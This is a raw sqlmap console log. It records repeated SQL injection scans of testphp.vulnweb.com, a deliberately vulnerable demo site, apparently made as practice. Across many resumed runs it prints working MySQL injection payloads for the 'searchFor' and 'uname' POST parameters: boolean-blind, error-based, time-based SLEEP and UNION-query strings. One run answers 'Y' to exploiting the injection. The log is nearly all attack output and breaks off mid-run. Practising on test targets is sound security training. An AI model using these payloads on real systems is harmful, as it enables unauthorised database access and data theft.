
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.7.7#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:17:16 /2025-08-01/

[17:17:16] [INFO] testing connection to the target URL
[17:17:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:17:16] [INFO] testing if the target URL content is stable
[17:17:17] [INFO] target URL content is stable
[17:17:17] [INFO] testing if POST parameter 'searchFor' is dynamic
[17:17:17] [WARNING] POST parameter 'searchFor' does not appear to be dynamic
[17:17:17] [INFO] heuristic (basic) test shows that POST parameter 'searchFor' might be injectable (possible DBMS: 'MySQL')
[17:17:17] [INFO] heuristic (XSS) test shows that POST parameter 'searchFor' might be vulnerable to cross-site scripting (XSS) attacks
[17:17:17] [INFO] testing for SQL injection on POST parameter 'searchFor'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[17:17:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:17:29] [WARNING] reflective value(s) found and filtering out
[17:17:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:17:30] [INFO] testing 'Generic inline queries'
[17:17:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:17:32] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:17:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:17:36] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[17:17:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[17:17:44] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[17:17:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[17:17:51] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[17:17:55] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:17:57] [INFO] POST parameter 'searchFor' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable (with --string="Our")
[17:17:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:17:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:17:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:17:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:17:57] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:17:57] [INFO] POST parameter 'searchFor' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[17:17:57] [INFO] testing 'MySQL inline queries'
[17:17:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:17:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:17:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:17:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:17:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:17:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:17:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:18:02] [INFO] POST parameter 'searchFor' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[17:18:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:18:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:18:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:18:05] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[17:18:06] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[17:18:07] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[17:18:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[17:18:09] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[17:18:10] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[17:18:11] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[17:18:12] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[17:18:13] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'searchFor' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 794 HTTP(s) requests:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:18:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:18:14] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:18:14 /2025-08-01/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:18:15 /2025-08-01/

[17:18:15] [INFO] resuming back-end DBMS 'mysql' 
[17:18:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:18:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:18:15] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:18:15 /2025-08-01/

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:18:15 /2025-08-01/

[17:18:16] [INFO] resuming back-end DBMS 'mysql' 
[17:18:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:18:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[17:18:16] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:18:16 /2025-08-01/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:18:16 /2025-08-01/

[17:18:17] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] 
[17:18:38] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:18:39] [INFO] testing if the target URL content is stable
[17:18:39] [WARNING] POST parameter 'uname' does not appear to be dynamic
[17:18:39] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[17:18:39] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[17:18:39] [INFO] testing for SQL injection on POST parameter 'uname'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[17:21:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:21:05] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[17:21:06] [WARNING] reflective value(s) found and filtering out
[17:21:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:21:06] [INFO] testing 'Generic inline queries'
[17:21:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:21:10] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:21:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:21:16] [INFO] POST parameter 'uname' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable 
[17:21:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:21:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:21:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:21:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:21:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:21:16] [INFO] POST parameter 'uname' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[17:21:16] [INFO] testing 'MySQL inline queries'
[17:21:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:21:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:21:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:21:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:21:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:21:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:21:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:21:27] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[17:21:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:21:27] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:21:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:21:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:21:27] [INFO] target URL appears to have 8 columns in query
[17:21:28] [INFO] POST parameter 'uname' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[17:21:28] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 9657=9657#&pass=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x716a717171,(SELECT (ELT(9925=9925,1))),0x717a786a71),9925)-- grnZ&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 9742 FROM (SELECT(SLEEP(5)))xoTk)-- ARLk&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717171,0x64715455646c5a426544766654454759737147777a4441525871776b694d444e634d534347474f4f,0x717a786a71),NULL,NULL#&pass=1
---
[17:21:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[17:21:28] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:28 /2025-08-01/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:28 /2025-08-01/

[17:21:29] [INFO] resuming back-end DBMS 'mysql' 
[17:21:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:21:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[17:21:29] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:29 /2025-08-01/

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:45 /2025-08-01/

[17:21:45] [INFO] resuming back-end DBMS 'mysql' 
[17:21:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:21:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:21:46] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:46 /2025-08-01/

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:46 /2025-08-01/

[17:21:46] [INFO] resuming back-end DBMS 'mysql' 
[17:21:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:21:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:21:46] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:46 /2025-08-01/

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:47 /2025-08-01/

[17:21:47] [INFO] resuming back-end DBMS 'mysql' 
[17:21:47] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 9657=9657#&pass=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=1' AND GTID_SUBSET(CONCAT(0x716a717171,(SELECT (ELT(9925=9925,1))),0x717a786a71),9925)-- grnZ&pass=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 9742 FROM (SELECT(SLEEP(5)))xoTk)-- ARLk&pass=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: uname=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717171,0x64715455646c5a426544766654454759737147777a4441525871776b694d444e634d534347474f4f,0x717a786a71),NULL,NULL#&pass=1
---
[17:21:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[17:21:54] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:54 /2025-08-01/

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:54 /2025-08-01/

[17:21:55] [INFO] resuming back-end DBMS 'mysql' 
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:21:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:21:55] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:55 /2025-08-01/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:21:55 /2025-08-01/

[17:21:55] [INFO] resuming back-end DBMS 'mysql' 
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(4513,CASE WHEN (4513=4513) THEN 4513 ELSE 0x3A END) AND 'hGVD'='hGVD

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x7171626b71,(SELECT (ELT(7205=7205,1))),0x716b6b6b71),7205) AND 'kcTF'='kcTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=1' AND (SELECT 5479 FROM (SELECT(SLEEP(5)))FasI) AND 'DxmE'='DxmE
---
[17:21:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[17:21:56] [INFO] fetched data logged to text files under '/Users/revantpatel/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 17:21:56 /2025-08-01/

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.7.7#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:03:17 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=1
do you want to test this URL? [Y/n/q]
> Y
[06:03:17] [INFO] testing URL 'http://testphp.vulnweb.com/search.php?test=query'
[06:03:17] [INFO] resuming back-end DBMS 'mysql' 
[06:03:17] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0603am.csv' as the CSV results file in multiple targets mode
[06:03:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(2508,CASE WHEN (2508=2508) THEN 2508 ELSE 0x3A END) AND 'XfgQ'='XfgQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchFor=1' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(9342=9342,1))),0x7170707071),9342) AND 'qMxl'='qMxl
---
do you want to exploit this SQL injection? [Y/n] Y
[06:03:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[06:03:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0603am.csv'

[*] ending @ 06:03:18 /2025-08-02/

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:03:19 /2025-08-02/

[1/1] URL:
GET http://testphp.vulnweb.com/userinfo.php
POST data: uname=1&pass=1
do you want to test this URL? [Y/n/q]
> Y
[06:03:19] [INFO] testing URL 'http://testphp.vulnweb.com/userinfo.php'
[06:03:19] [INFO] resuming back-end DBMS 'mysql' 
[06:03:19] [INFO] using 'C:\Users\MANSO\AppData\Local\sqlmap\output\results-08022025_0603am.csv' as the CSV results file in multiple targets mode
[06:03:19] [INFO] testing connection to the target URL
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=1' OR NOT 3842=3842#&pass=1

    Type: error-based
